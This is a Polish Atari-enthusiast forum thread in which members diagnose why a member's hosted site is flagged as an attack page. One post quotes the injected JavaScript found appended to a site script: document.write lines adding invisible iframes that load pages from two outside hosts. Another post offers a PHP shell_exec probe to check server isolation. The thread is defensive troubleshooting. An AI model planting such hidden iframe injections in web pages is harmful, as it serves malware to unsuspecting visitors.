Nie jesteś zalogowany. Proszę się zalogować lub zarejestrować.
Nowa obudowa dla 800XL - zostało 36 dni Niewiele ponad miesiąc do końca kampanii.
Zmarł twórca języka BASIC Zmarł Thomas E. Kurtz twórca języka BASIC
Zmiana serwera atari.area Serwis przeszedł właśnie ważną aktualizację infrastruktury
4th Atari ASCII Compo - wyniki Dostępne są już wyniki tegorocznego ATASCII Compo.
thing neo 1.60 Olivier Landemarre wydał nową wersję desktopu Thing.
atari.area forum » Bałagan » www.dereatari.republika.pl - repoeted attack page
Strony 1
Zaloguj się lub zarejestruj by napisać odpowiedź
Czy tylko w moim firefoxie czy u Was takze, strona Jer'a zostala zatagowana jako Attack page ? Znow cos google namieszalo
Jer,
"If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center."
Czyli zaloguj sie do Goole Webmaster Tools strony i zobacz dlaczego.
Też:/
Bezpieczne przeglądanie
Strona diagnostyczna witryny dereatari.republika.plJaki jest obecny stan bezpieczeństwa witryny dereatari.republika.pl?
Witryna została uznana za podejrzaną – jej odwiedzanie może stanowić zagrożenie dla komputera.
W ciągu ostatnich 90 dni część tej witryny została odnotowana z uwagi na podejrzane działania następującą liczbę razy: 1.
Co się stało podczas odwiedzin tej witryny przez Google?
W ciągu ostatnich 90 dni przetestowaliśmy w tej witrynie następującą liczbę stron: 1. Wyświetlanie 1 z nich spowodowało pobranie i zainstalowanie złośliwego oprogramowania bez zgody użytkownika. Witryna ta po raz ostatni była odwiedzana przez Google 2012-12-21, a po raz ostatni znaleziono w niej podejrzane treści 2012-12-21.
Ta witryna działała w następującej liczbie sieci: 1, m.in. AS12990 (ONET).
Czy ta witryna pośredniczyła w rozpowszechnianiu złośliwego oprogramowania?
Nie wydaje się, aby w ciągu ostatnich 90 dni witryna dereatari.republika.pl pośredniczyła w zarażaniu jakichkolwiek witryn.
Czy w tej witrynie działało złośliwe oprogramowanie?
Nie, w ciągu ostatnich 90 dni nie było w tej witrynie złośliwego oprogramowania.
Jak do tego doszło?
W pewnych przypadkach osoby trzecie mogą dodawać do legalnych witryn złośliwy kod, który spowoduje wyświetlanie przez nas komunikatu ostrzegawczego.
Dalsze czynności:
Wróć do poprzedniej strony.
Jeśli witryna należy do Ciebie, możesz zwrócić się o sprawdzenie jej za pomocą Narzędzi Google dla webmasterów. Więcej informacji na temat procesu sprawdzania można znaleźć w Centrum pomocy Google dla webmasterów.
Już było o tym w grudniu. Skasowałem konto, sprawdziłem pliki u siebie odrdzewiaczem i założyłem konto od nowa na onecie. Teraz znów się to pojawiło. Admini na onecie mają to w dupie, a to ich serwer, widać słabo zabezpieczony, bo wiele stron jest zakażonych. Jak tylko połączę się z serwerem zaraz mam trojana, komp się muli i robę pełny skan antywirusem, trojany usuwam i wszystko działa OK.
Problemy najprawdopodobniej stwarza to:
W pliku /skrypty/m-x.js
Na końcu doklejony jest taki kod:
document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://gclabrelscon.net/about.php"></iframe></div>');
document.write('<style>.vb_style_forum {filter: alpha(opacity=0);opacity: 0.0;width: 200px;height: 150px;}</style><div class="vb_style_forum"><iframe height="150" width="200" src="http://www.mc-plainlinde.at/upload/upload.php"></iframe></div>');Albo masz gdziś dziurę w którymś skrypcie php (upload jakiś), albo server dziurawy i przez powłokę coś się uruchamia, nie koniecznie na twoim koncie.
co ciekawe niektore watki na aa tez czasem pojawiaja sie jako niebezpieczne, np ten, antywirus sygnalizuje mi iFrame
To też usuwałem, pojawia się znowu jak widać.
Musiał bym wrzucić jakiśprogramik wykrywający np. "opacity" i robiący miszmasz przypadkowo zamieniając litery w tym słówku, ale jestem za krótki w tym.
uruchom taki skrypt na serverze w głównym katalogu.
<?php
print_r (shell_exec('cd ..;ls')
?>Jak się wykona i poda katalogi nadrzędne to jest na 95% wina servera.
Jeszcze jedna rzecz - jesli masz mozliwosc ustawiania uprawnien do plikow przez FTP ustaw je read only (naturalnie poza tymi gdzie strona ma zapisywac). Wiele serwerow udostepnia obok POST i GET metode PUT za pomoca ktorej mozna uploadowac pliki na serwer, oczywiscie jest sa prawa do zapisu. Tak najczesciej doklejaja sie te gowna - najczesciej do plikow .js.
Drugie miejsce gdzie lubia sie doklejac, to zarazony komp programisty, ktory je w takiej juz formie sam uploaduje na serwer :))
Strony 1
Zaloguj się lub zarejestruj by napisać odpowiedź
atari.area forum » Bałagan » www.dereatari.republika.pl - repoeted attack page
Wygenerowano w 0.017 sekund, wykonano 58 zapytań